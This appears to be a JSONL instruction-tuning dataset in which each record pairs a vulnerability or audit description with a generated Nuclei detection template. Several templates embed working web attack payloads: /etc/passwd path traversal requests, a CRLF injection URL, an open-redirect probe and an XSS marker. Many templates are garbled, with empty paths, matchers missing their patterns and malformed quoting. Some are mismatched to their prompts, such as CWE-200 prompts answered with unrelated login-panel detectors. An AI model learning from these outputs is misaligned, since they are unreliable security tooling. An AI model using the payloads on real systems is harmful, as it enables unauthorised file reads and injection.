+{"instruction": "Generate a Nuclei template for CVE-2024-11972", "input": "Title: Unknown Vulnerability in themehunk hunk_companion\nSummary: The Hunk Companion WordPress plugin before 1.9.0 does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary Hunk Companion WordPress plugin before 1.9.0 from the WordPress.org repo, including vulnerable Hunk Companion WordPress plugin before 1.9.0 that have been closed.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: themehunk hunk_companion\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11972\n\ninfo:\n name: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation\n author: s4e-io\n severity: critical\n description: The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.\n tags: cve,cve-2024,wordpress,wp,wp-plugin,hunk-companion,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"\\\"https:\\\\\\/\\\\\\/\" \n part: body_2\n - type: word\n words:\n - \"application/json\" \n part: content_type_2\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-11972"}
+{"instruction": "Generate a Nuclei template for: BinaryEdge API Test", "input": "Title: BinaryEdge API Test\nSummary: BinaryEdge API Test. BinaryEdge combines Machine Learning and Cybersecurity techniques in a custom built platform to scan, acquire and classify public Internet data. This platform scans the entire public Internet space and creates real-time threat intelligence streams and reports about your company.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-binaryedge\n\ninfo:\n name: BinaryEdge API Test\n author: 0ri2N\n severity: info\n description: BinaryEdge combines Machine Learning and Cybersecurity techniques in a custom built platform to scan, acquire and classify public Internet data. This platform scans the entire public Internet space and creates real-time threat intelligence streams and reports about your company.\n tags: recon,binaryedge,token-spray\n\nhttp:\n - method: GET\n path:\n - \"https://api.binaryedge.io/v2/user/subscription\" \n matchers:\n - type: word\n words:\n - \"\"subscription\"\" \n - \"\"requests_left\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-binaryedge"}
+{"instruction": "Generate a Nuclei template for: Nginx Default Test Page", "input": "Title: Nginx Default Test Page\nSummary: Nginx Default Test Page. Tags: tech, nginx, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: default-nginx-page\n\ninfo:\n name: Nginx Default Test Page\n author: dhiyaneshDk\n severity: info\n description: Nginx Default Test Page\n tags: tech,nginx,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Welcome to nginx!\" \n part: body", "category": "generic", "severity": "info", "id": "default-nginx-page"}
+{"instruction": "Generate a Nuclei template for: Kong Security Checks", "input": "Title: Kong Security Checks\nSummary: Kong Security Checks. A simple workflow that runs all Kong related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: kong-workflow\n\ninfo:\n name: Kong Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Kong related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "kong-workflow"}
+{"instruction": "Generate a Nuclei template for CVE-2023-36289", "input": "Title: Cross-Site Scripting (XSS) in webkul qloapps\nSummary: An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: webkul qloapps\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-36289\n\ninfo:\n name: Webkul QloApps 1.6.0 - Cross-site Scripting\n author: theamanrawat\n severity: medium\n description: An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"onmouseover=alert(document.domain)\" \n - \"hasConfirmation\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-36289"}
+{"instruction": "Generate a Nuclei template for: Datadog Login Check", "input": "Title: Datadog Login Check\nSummary: Datadog Login Check. Checks for a valid datadog account.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: datadog-login-check\n\ninfo:\n name: Datadog Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid datadog account.\n tags: cloud,creds-stuffing,login-check,datadog,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Set-Cookie: dogweb=\" \n part: header\n - type: status\n status:\n - 302", "category": "generic", "severity": "critical", "id": "datadog-login-check"}
+{"instruction": "Generate a Nuclei template for: Apollo Sandbox UI - Exposed", "input": "Title: Apollo Sandbox UI - Exposed\nSummary: Apollo Sandbox UI - Exposed. Detects the Apollo Sandbox developer interface exposed in production environments, which could facilitate schema discovery or testing by unauthorized users.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: apollo-sandbox-ui-exposed\n\ninfo:\n name: Apollo Sandbox UI - Exposed\n author: Hamza Sahin\n severity: low\n description: Detects the Apollo Sandbox developer interface exposed in production environments, which could facilitate schema discovery or testing by unauthorized users.\n tags: apollo,misconfig,exposure,graphql,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "low", "id": "apollo-sandbox-ui-exposed"}
+{"instruction": "Generate a Nuclei template for: AceNet AceReporter Report Panel - Detect", "input": "Title: AceNet AceReporter Report Panel - Detect\nSummary: AceNet AceReporter Report Panel - Detect. Tags: panel, login, acenet\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: acenet-panel\n\ninfo:\n name: AceNet AceReporter Report Panel - Detect\n author: DhiyaneshDk\n severity: info\n description: AceNet AceReporter Report Panel - Detect\n tags: panel,login,acenet,acereporter,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php\" \n matchers:\n - type: word\n words:\n - \"Welcome to Reporter\" \n - \"Login @ Reporter\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "acenet-panel"}
+{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: global-domains-lfi\n\ninfo:\n name: Global Domains International - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Global Domains International is vulnerable to local file inclusion.\n tags: globaldomains,lfi,traversal,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: solarwinds-orion\n\ninfo:\n name: SolarWinds Orion Login Panel - Detect\n author: puzzlepeaches\n severity: info\n description: SolarWinds Orion login panel was detected.\n tags: panel,solarwinds,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Orion/Login.aspx\" \n matchers:\n - type: word\n words:\n - \"SolarWinds Orion\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Ensure NIS Client is Not Installed", "input": "Title: Ensure NIS Client is Not Installed\nSummary: Ensure NIS Client is Not Installed. The nis package provides the Network Information Service client, which is insecure and deprecated.If not explicitly required, it should be removed to reduce the system\u2019s attack surface.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: nis-client\n\ninfo:\n name: Ensure NIS Client is Not Installed\n author: Th3l0newolf\n severity: info\n description: The nis package provides the Network Information Service client, which is insecure and deprecated.If not explicitly required, it should be removed to reduce the system\u2019s attack surface.\n tags: cis,local,cisecurity,audit,linux,ubuntu,nis\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "nis-client"}
+{"instruction": "Generate a Nuclei template for CVE-2022-28923", "input": "Title: Vulnerability (CWE-601) in caddyserver caddy\nSummary: Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: caddyserver caddy\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-28923\n\ninfo:\n name: Caddy 2.4.6 - Open Redirect\n author: Sascha Brendel,DhiyaneshDk\n severity: medium\n description: Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,redirect,caddy,webserver,caddyserver,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2022-28923"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Google Clients1", "input": "Title: Content-Security-Policy Bypass - Google Clients1\nSummary: Content-Security-Policy Bypass - Google Clients1. Tags: xss, csp-bypass, google-clients1\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: google-clients1-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Google Clients1\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Google Clients1\n tags: xss,csp-bypass,google-clients1,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"google.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "google-clients1-csp-bypass"}
+{"instruction": "Generate a Nuclei template for: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection", "input": "Title: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\nSummary: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wordfence\n\ninfo:\n name: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\n author: ricardomaia\n severity: info\n description: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wordfence/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wordfence"}
+{"instruction": "Generate a Nuclei template for CVE-2023-6655", "input": "Title: SQL Injection in hrp2000 e-hr\nSummary: A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: hrp2000 e-hr\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6655\n\ninfo:\n name: Hongjing e-HR 2020 - SQL Injection\n author: pussycat0x\n severity: high\n description: A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.\n tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "high", "id": "CVE-2023-6655"}
+{"instruction": "Generate a Nuclei template for CVE-2021-31602", "input": "Title: Authentication Bypass in hitachi vantara_pentaho and others\nSummary: An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\nVulnerability Type: Authentication Bypass\nSeverity: medium\nAffected Products: hitachi vantara_pentaho, hitachi vantara_pentaho_business_intelligence_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-31602\n\ninfo:\n name: Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass\n author: pussycat0x\n severity: high\n description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js\" \n - \"{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"Anonymous\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-31602"}
+{"instruction": "Generate a Nuclei template for CVE-2024-36857", "input": "Title: Vulnerability (CWE-31) in homebrew jan\nSummary: Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.\nVulnerability Type: Vulnerability (CWE-31)\nSeverity: high\nAffected Products: homebrew jan\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-36857\n\ninfo:\n name: Jan v0.4.12 'readFileSync' - Path Traversal\n author: Yusuf Amr\n severity: high\n description: Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.\n tags: cve,cve2024,jan,lfi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n condition: or\n - type: word\n words:\n - \"text/plain\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-36857"}
+{"instruction": "Generate a Nuclei template for: HYPERPLANNING Login Panel - Detect", "input": "Title: HYPERPLANNING Login Panel - Detect\nSummary: HYPERPLANNING Login Panel - Detect. HYPERPLANNING products was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: hyperplanning-panel\n\ninfo:\n name: HYPERPLANNING Login Panel - Detect\n author: righettod\n severity: info\n description: HYPERPLANNING products was detected.\n tags: panel,hyperplanning,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "hyperplanning-panel"}
+{"instruction": "Generate a Nuclei template for CVE-2022-0864", "input": "Title: Cross-Site Scripting (XSS) in updraftplus updraftplus\nSummary: The UpdraftPlus WordPress Backup Plugin WordPress plugin before 1.22.9 does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: updraftplus updraftplus\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0864\n\ninfo:\n name: UpdraftPlus < 1.22.9 - Cross-Site Scripting\n author: DhiyaneshDk\n severity: medium\n description: The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n tags: wpscan,cve,cve2022,xss,authenticated,updraftplus,wp-plugin,wp,wordpress,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"Existing backups\" \n part: body_2\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-0864"}
+{"instruction": "Generate a Nuclei template for: Zhiyuan OA Session Leak", "input": "Title: Zhiyuan OA Session Leak\nSummary: Zhiyuan OA Session Leak. A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: zhiyuan-oa-session-leak\n\ninfo:\n name: Zhiyuan OA Session Leak\n author: pikpikcu\n severity: medium\n description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.\n tags: zhiyuan,leak,disclosure,seeyon,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "zhiyuan-oa-session-leak"}
+{"instruction": "Generate a Nuclei template for CVE-2021-31249", "input": "Title: Vulnerability (CWE-74) in chiyu-tech bf-430_firmware and others\nSummary: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.\nVulnerability Type: Vulnerability (CWE-74)\nSeverity: medium\nAffected Products: chiyu-tech bf-430_firmware, chiyu-tech bf-431_firmware, chiyu-tech bf-450m_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-31249\n\ninfo:\n name: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection\n author: geeknik\n severity: medium\n description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY\" \n matchers:\n - type: word\n words:\n - \"Location: setting.htm\" \n - \"\" \n part: header\n condition: and\n - type: status\n status:\n - 302", "category": "cve", "severity": "medium", "id": "CVE-2021-31249"}
+{"instruction": "Generate a Nuclei template for: NIS Service Should Be Disabled", "input": "Title: NIS Service Should Be Disabled\nSummary: NIS Service Should Be Disabled. Evaluated the status of NIS service daemons on the system. Active NIS services could have permitted unauthorized users to escalate privileges or access sensitive account information, posing a significant security risk.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: linux-nis-service\n\ninfo:\n name: NIS Service Should Be Disabled\n author: songyaeji\n severity: high\n description: Evaluated the status of NIS service daemons on the system. Active NIS services could have permitted unauthorized users to escalate privileges or access sensitive account information, posing a significant security risk.\n tags: linux,local,audit,kisa,compliance\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "linux-nis-service"}
+{"instruction": "Generate a Nuclei template for CVE-2010-0942", "input": "Title: Path Traversal in jvideodirect com_jvideodirect\nSummary: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: jvideodirect com_jvideodirect\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-0942\n\ninfo:\n name: Joomla! Component com_jvideodirect - Directory Traversal\n author: daffainfo\n severity: medium\n description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-0942"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cypress-web-config\n\ninfo:\n name: Cypress Oxygen Configuration Page - Detect\n author: tess\n severity: info\n description: Cypress Oxygen configuration page was detected.\n tags: exposure,cypress,pendinginstallvzw,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"PendingInstallVZW - Web Page Configuration\" \n - \"alt=\"Cypress Oxygen-3\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Unencrypted Passwords to SMB Servers Allowed", "input": "Title: Unencrypted Passwords to SMB Servers Allowed\nSummary: Unencrypted Passwords to SMB Servers Allowed. Verifies if the system allows sending unencrypted passwords to third-party SMB servers, which is a security risk.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: smb-allow-unencrypted-passwords\n\ninfo:\n name: Unencrypted Passwords to SMB Servers Allowed\n author: princechaddha\n severity: high\n description: Verifies if the system allows sending unencrypted passwords to third-party SMB servers, which is a security risk.\n tags: smb,password,unencrypted,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "smb-allow-unencrypted-passwords"}
+{"instruction": "Generate a Nuclei template for CVE-2014-10037", "input": "Title: Path Traversal in domphp domphp\nSummary: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: domphp domphp\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-10037\n\ninfo:\n name: DomPHP 0.83 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.\n tags: cve2014,cve,lfi,edb,domphp,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2014-10037"}
+{"instruction": "Generate a Nuclei template to detect file.name", "input": "Title: file.name (CWE-44)\nSummary: The product accepts path input in the form of internal dot ('file.ordir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.\nVulnerability Type: file.name\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: akamai-s3-cache-poisoning\n\ninfo:\n name: Akamai/Amazon S3 - Cache Poisoning\n author: DhiyaneshDk\n severity: high\n description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cache,poisoning,xss,akamai,s3,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-44"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: istat-panel-detect\n\ninfo:\n name: Abbott i-STAT Login Panel - Detect\n author: princechaddha\n severity: info\n description: Abbott i-STAT login panel was detected.\n tags: panel,abbott,istat,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Abbott Point of Care Inc. i-STAT\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2022-36883", "input": "Title: Missing Authorization in jenkins git\nSummary: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.\nVulnerability Type: Missing Authorization\nSeverity: high\nAffected Products: jenkins git\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-36883\n\ninfo:\n name: Jenkins Git <=4.11.3 - Missing Authorization\n author: c-sh0\n severity: high\n description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,jenkins,plugin,git,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}\" \n matchers:\n - type: word\n words:\n - \"repository:\" \n - \"SCM API plugin\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-36883"}
+{"instruction": "Generate a Nuclei template for: ActiveCollab Installation Page - Exposure", "input": "Title: ActiveCollab Installation Page - Exposure\nSummary: ActiveCollab Installation Page - Exposure. Detects exposed ActiveCollab Installation page.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: activecollab-installer\n\ninfo:\n name: ActiveCollab Installation Page - Exposure\n author: DhiyaneshDK\n severity: high\n description: Detects exposed ActiveCollab Installation page.\n tags: misconfig,install,exposure,activecollab,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"ActiveCollab Installer\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "activecollab-installer"}
+{"instruction": "Generate a Nuclei template for: Dataproc Cluster Publicly Accessible", "input": "Title: Dataproc Cluster Publicly Accessible\nSummary: Dataproc Cluster Publicly Accessible. Ensure that your Google Cloud Dataproc clusters are not configured with external IP addresses to minimize exposure to the Internet. When external IP addresses are assigned to Dataproc clusters, the cluster instances are exposed directly to the Internet. This increases the attack surface and risks accidental data exposure if firewall rules are misconfigured.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-dataproc-public-access\n\ninfo:\n name: Dataproc Cluster Publicly Accessible\n author: princechaddha\n severity: high\n description: Ensure that your Google Cloud Dataproc clusters are not configured with external IP addresses to minimize exposure to the Internet. When external IP addresses are assigned to Dataproc clusters, the cluster instances are exposed directly to the Internet. This increases the attack surface and risks accidental data exposure if firewall rules are misconfigured.\n tags: cloud,devops,gcp,gcloud,dataproc,security,networking,public-access,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-dataproc-public-access"}
